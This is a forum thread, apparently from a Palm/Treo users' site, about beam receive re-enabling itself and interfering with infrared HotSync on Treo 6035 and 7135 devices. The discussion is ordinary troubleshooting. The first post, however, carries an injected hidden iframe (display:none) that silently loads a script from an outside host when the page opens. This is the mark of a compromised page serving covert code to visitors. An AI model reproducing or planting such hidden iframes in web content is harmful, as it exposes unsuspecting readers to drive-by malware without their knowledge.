+ Reply to Thread

Disabling Beam Receive

Is there a way to disable beam receive permanently until the user turns it back on? The reason I ask is that I can turn off beam receive from the PDA-Prefs screen but I will check it later and it will be turned back on even though I haven't reset or repowered the device. I am trying to see if disabling it will significantly help battery life like it does for Pocket PC devices but I can't get it to stay off to find out. Any help is appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PPC devices actively probe out for a connection. Palm doesn't unless you tell it to. Recieving readiness takes almost no power.

The main reason that I'd like to disable it is because it annoys me. I hotsync via ir on my laptop, and everytime I set the phone next to the ir port to hotsync, it pops up the 'IR receive' box which i have to cancel so that I can do the hotsync.

As with fireman, I can turn it off, but next time I go to prefs, it seems to have reenabled itself. (i'm on a 6035, but i'm guessing it doesn't matter)
    -- Everything I say is pure speculation.

Originally posted by kvandivo
    The main reason that I'd like to disable it is because it annoys me. I hotsync via ir on my laptop, and everytime I set the phone next to the ir port to hotsync, it pops up the 'IR receive' box which i have to cancel so that I can do the hotsync.

As with fireman, I can turn it off, but next time I go to prefs, it seems to have reenabled itself. (i'm on a 6035, but i'm guessing it doesn't matter)
    I also hotsync via ir port to my laptop, and I had that same problem with my 6035. I haven't had the problem with my 7135 though... No matter how long I set the 7135 next to the ir port, the beam receive message does not appear. :dunno

Why not jsut disable the wireless link in the Windows control panel? You can turn off file sharing via IR in there so it should quit looking?

Originally posted by HoTSynC
    Why not jsut disable the wireless link in the Windows control panel? You can turn off file sharing via IR in there so it should quit looking?
    Then again, the 7135 should not be reactivating this on it's own. No other Palm device I have owned has had a problem leaving beam receive off when I turned it off.

Alan

I am hotsyncing my phone with my laptop using IR and at this point I am starting to believe that it is a IR Hotsync that turns this feature back on. Will have to investigate further.

The beam recv seems to turn back on for me after soft resets...